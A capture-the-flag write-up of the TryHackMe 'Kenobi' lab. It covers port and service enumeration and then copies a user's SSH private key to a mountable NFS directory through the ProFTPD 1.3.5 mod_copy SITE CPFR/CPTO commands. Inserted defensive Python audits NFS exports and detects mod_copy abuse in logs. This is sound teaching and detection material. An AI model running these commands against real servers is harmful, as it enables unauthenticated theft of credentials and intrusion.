https://noxious.tech/posts/Kenobi/

https://tryhackme.com/room/kenobi

Enumeration

rustscan -a <TARGET_IP>

PORT      STATE SERVICE      REASON
21/tcp    open  ftp          syn-ack
22/tcp    open  ssh          syn-ack
80/tcp    open  http         syn-ack
111/tcp   open  rpcbind      syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
2049/tcp  open  nfs          syn-ack
36165/tcp open  unknown      syn-ack
37467/tcp open  unknown      syn-ack
42469/tcp open  unknown      syn-ack
44495/tcp open  unknown      syn-ack

nmap -sC -sV <TARGET_IP> -p 21,22,80,111,139,445,2049

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36165/tcp   mountd
|   100005  1,2,3      48311/udp6  mountd
|   100005  1,2,3      48836/udp   mountd
|   100005  1,2,3      60131/tcp6  mountd
|   100021  1,3,4      33865/udp   nlockmgr
|   100021  1,3,4      34803/tcp6  nlockmgr
|   100021  1,3,4      44495/tcp   nlockmgr
|   100021  1,3,4      60660/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m52s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2022-02-22T08:46:04-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-22T14:46:04
|_  start_date: N/A

Since port 111 (rpcbind) is open, we use nmap's NFS scripts to check whether any filesystems are exported:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.197.74

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *
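The "/var *" line above means the export is mountable by any client. As an added example (not part of the writeup), the following script audits /etc/exports-style entries for exactly that class of weakness; the export table it checks is constructed, with the first entry mirroring what nfs-showmount reported here.

```python
"""Audit /etc/exports-style entries for the weaknesses that make an export
like "/var *" readable from any host.  Added example; table is constructed."""
import re

# Constructed sample.  The first entry mirrors the "/var *" export that
# nmap's nfs-showmount script reported on Kenobi.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed)
/var *(rw,sync,no_subtree_check)
/srv/share 10.10.0.0/16(ro,sync,root_squash)
/export/data 10.10.10.5(rw,sync,no_root_squash)
"""

SYSTEM_PATHS = ("/", "/var", "/etc", "/home", "/root", "/usr")
CLIENT_RE = re.compile(r"^(\S+?)(?:\((.*)\))?$")   # host[(opt,opt,...)]

def parse_exports(text):
    """Return one record per (path, client) pair with its option list."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:       # bare path == mountable by all
            m = CLIENT_RE.match(spec)
            opts = m.group(2) or ""
            records.append({"path": path, "host": m.group(1),
                            "opts": [o for o in opts.split(",") if o]})
    return records

def audit_export(rec):
    """Return the list of findings for one export record (empty if clean)."""
    findings = []
    world = rec["host"] == "*" or rec["host"].startswith("*.")
    if world:
        findings.append("wildcard client: any host may mount")
    if any(rec["path"] == p or rec["path"].startswith(p + "/") for p in SYSTEM_PATHS):
        findings.append("system directory exported: " + rec["path"])
    if "no_root_squash" in rec["opts"]:
        findings.append("no_root_squash: remote root keeps uid 0")
    if world and "rw" in rec["opts"]:
        findings.append("world-writable export")
    return findings

def audit_exports(text):
    """Map 'path host' -> findings for every export that has any."""
    return {f"{r['path']} {r['host']}": audit_export(r)
            for r in parse_exports(text) if audit_export(r)}
```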

Enumerating Samba Shares:

smbclient -L \\\\<TARGET_IP>\\
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      
	IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))

An anonymous share is enabled, so we can access it without providing a password:

smbclient \\\\<TARGET_IP>\\anonymous
smb: \> ls
  .                                   D        0  Wed Sep  4 18:49:09 2019
  ..                                  D        0  Wed Sep  4 18:56:07 2019
  log.txt                             N    12237  Wed Sep  4 18:49:09 2019
		9204224 blocks of size 1024. 6877092 blocks available
smb: \> get log.txt

log.txt

From log.txt we learn that an SSH key was generated at /home/kenobi/.ssh/id_rsa.

Exploitation

Searching for exploits for ProFTPD 1.3.5, we find the mod_copy exploit at https://www.exploit-db.com/exploits/36742. It allows copying files from one directory to another without being authenticated. Since we already know the path of Kenobi's SSH key and that /var can be mounted, we can copy the key into /var:

nc <TARGET_IP> 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.197.74]

site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

site cpto /var/tmp/id_rsa
250 Copy successful
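A detection-side counterpart to the exchange above, added here and not part of the writeup: it scans a ProFTPD ExtendedLog for SITE CPFR/CPTO commands from clients that never completed a login, and links a successful CPTO back to its CPFR source. It assumes ProFTPD's default LogFormat (%h %l %u %t "%r" %s %b); the log lines are constructed.

```python
"""Detect ProFTPD mod_copy abuse (SITE CPFR / SITE CPTO) in an ExtendedLog.
Added example, not part of the writeup.  Assumes ProFTPD's default
LogFormat  %h %l %u %t "%r" %s %b ; the log lines below are constructed."""
import re

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$')

# Constructed sample: one authenticated session, then an unauthenticated
# CPFR/CPTO sequence matching the one shown in the writeup.
SAMPLE_LOG = """\
10.10.10.20 UNKNOWN alice [22/Feb/2022:14:40:01 -0600] "USER alice" 331 -
10.10.10.20 UNKNOWN alice [22/Feb/2022:14:40:02 -0600] "PASS (hidden)" 230 -
10.10.10.20 UNKNOWN alice [22/Feb/2022:14:40:05 -0600] "RETR report.pdf" 226 10240
10.10.14.5 UNKNOWN - [22/Feb/2022:14:46:10 -0600] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350 -
10.10.14.5 UNKNOWN - [22/Feb/2022:14:46:12 -0600] "SITE CPTO /var/tmp/id_rsa" 250 -
"""

# Sources nobody should be copying through FTP: SSH keys, /etc, /root.
SENSITIVE_SRC = re.compile(r"^/(home/[^/]+/\.ssh|etc|root)(/|$)")

def detect_mod_copy_abuse(log_text):
    """Return one alert dict per SITE CPFR/CPTO seen.  An alert is marked
    unauthenticated when its client never received a 230 login reply, and
    a successful CPTO is linked back to the CPFR source it completes."""
    authed, pending_src, alerts = set(), {}, []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not in the expected format
        host, cmd, status = m["host"], m["cmd"], m["status"]
        if status == "230":
            authed.add(host)              # login completed for this client
        parts = cmd.split(" ", 2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        if sub not in ("CPFR", "CPTO"):
            continue
        alert = {"host": host, "cmd": sub, "path": arg, "status": status,
                 "unauthenticated": host not in authed}
        if sub == "CPFR" and status == "350":          # source accepted
            pending_src[host] = arg
            alert["sensitive_source"] = bool(SENSITIVE_SRC.match(arg))
        elif sub == "CPTO" and status == "250":         # copy completed
            alert["copied_from"] = pending_src.pop(host, None)
        alerts.append(alert)
    return alerts
```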

Now we just need to mount /var on our local machine:

sudo mount <TARGET_IP>:/var /mnt/

cd /mnt/
ls
backups  crash  local  log   opt  snap   tmp
cache    lib    lock   mail  run  spool  www

Based on the copy we made over netcat, id_rsa is now in the tmp folder:

id_rsa